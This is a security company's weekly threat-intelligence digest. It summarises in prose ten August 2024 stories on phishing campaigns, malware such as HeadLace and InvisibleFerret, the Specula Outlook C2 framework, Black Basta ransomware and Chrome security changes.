WEEKLY TOP TEN: August 5, 2024, 16:00 GMT
- Fighting Ursa Luring Targets With Car for Sale
Russian threat actors known as Fighting Ursa/APT28 have been operating a new campaign to distribute their backdoor malware, HeadLace. The campaign includes many popular hosting providers to make it appear legitimate to end users. APT28 has been seen targeting diplomats and other high-value targets with this phishing attack, luring victims in with ads for expensive vehicles.
The infection chain starts with Webhook.site, a legitimate hosting provider. The hosted site contains malicious HTML, which prompts users to download a zip archive that contains the HeadLace backdoor. The files in the archive are obfuscated to appear legitimate; when these files are executed, they download and execute additional malware. - OneDrive Pastejacking: The Crafty Phishing and Downloader Campaign
Security researchers at Trellix have identified a new phishing campaign that instructs users to paste encoded Base64 into PowerShell. It starts with a phishing email containing an HTML file that appears as a OneDrive page. When opened, it displays a fake error with legitimate error details and links to the official Microsoft error page.
If the user clicks on “how to fix,” the Base64 is inserted into the clipboard, and they are instructed on how to open PowerShell and execute the command in the clipboard. Once executed, a 3x script is downloaded and executed, infecting the user. - Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes
A report from Zimperium reveals there are over 107,000 Android apps that contain malware to intercept OTP codes from text messages. Once a malicious app had been installed, it would ask for SMS permissions. When allowed, these apps exfiltrated incoming SMS messages containing OTP codes.
The researchers at Zimperium believe these apps would sign your phone number up for services, made possible due to the OTP code access. Google says users are automatically protected against this malware via Google Play Protect. - North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS
Threat actors are posing as potential employers in a new campaign that tricks software developers into downloading malware. The campaign, dubbed DEV#POPPER starts with an online job interview where the threat actors instruct job seekers to download malicious packages during the interview.
When the victim installs the npm packages, their system becomes infected with InvisibleFerret, an infostealer and keylogger. - Threat Actor Abuses Cloudflare Tunnels to Deliver RATs
Researchers at Proofpoint have observed threat actors abusing Cloudflare Tunnels to deliver malware in a phishing campaign. These tunnels allow for data to be remotely accessed and do not require an account to create the necessary one-time tunnel.
Proofpoint has observed tens of thousands of phishing emails sent using these malicious Cloudflare tunnels. When a user falls victim to the phish, they are infected with a Remote Access Trojan (RAT), with Xworm being the most prevalent RAT used in this campaign. - Proofpoint Settings Exploited to Send Millions of Phishing Emails Daily
Weak permissions in Proofpoint’s email protection service allowed miscreants to send millions of spoofed emails. These emails were impersonating large companies, such as Disney, Nike, and IBM.
The threat actors started by spinning up an STMP server to create the spoofed emails, these were then relayed through Proofpoint’s servers using compromised Microsoft Office 365 accounts.
These occurred due to weak permission settings in Proofpoint when a Microsoft domain was used for relay. Proofpoint trusted any Office 365 IP address ranges, which they have since corrected. - New Specula Tool Uses Outlook for Remote Code Execution (RCE) in Windows
TrustedSec released a new red team post-exploitation framework called “Specula” on July 29th. Specula is a C2 framework that turns Microsoft Outlook into a C2 beacon by using a custom Outlook Home Page. The custom page can be set using a Windows Registry value and still works in the current version of Outlook. This custom Home Page can be used to serve visual basic or JavaScript malware. Since Specula works in the context of Outlook, the parent process is outlook.exe, allowing for additional evasion. - Black Basta Ransomware Switches to More Evasive Custom Malware
Black Basta is a ransomware gang responsible for over 500 successful attacks. Most recently, its attacks leveraged new TPPs since law enforcement agencies disrupted its old partner, QBot. The gang has been observed using a new backdoor malware named SilentNight. This marks a change in tactics as SilentNight is delivered through malvertising. Analysts have also observed Black Basta using customized malware that seems to be developed internally instead of publicly available tools. - Improving the Security of Chrome Cookies on Windows
Google has finally implemented a secure solution to storing cookies on Windows machines. In the past, Chrome utilized the OS for encrypting cookies. For macOS, Chrome used Keychain, and for Linux, a system-provided wallet. On Windows, Chrome uses DPAPI for encryption, but DPAPI is not very secure compared to Keychain, or Linux-based encryption methods.
Anything encrypted with DPAPI can be easily decrypted, as long as you are still signed in as the user who initially encrypted the data. As of Chrome 127, Google has implemented application-bound encryption, which allows Chrome to encrypt data on Windows machines similar to how MacOS’s Keychain works. - Google Chrome Warns uBlock Origin May Soon Be Disabled
In other Chrome news, Google has begun its depreciation of Manifest V2 extensions. With Chrome 127, there are now warning banners placed next to extensions that have not changed to Manifest V3 (MV3). uBlock Origin’s creator, Raymond Hill, has stated that his extension can’t exist on MV3 due to the security changes that Google is enforcing with MV3. This is a potential security risk since ad-blocking extensions such as uBlock can protect users from malware, either through malicious redirect links or from malicious advertising. While Google’s [timeline] does not have an exact date on when MV2 extensions will be disabled, it shows it will be soon.
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The following top 10 stories were selected from the 40+ original ones we determined to be most significant during the course of the week, ranking by highest risk and using multiple sources when available: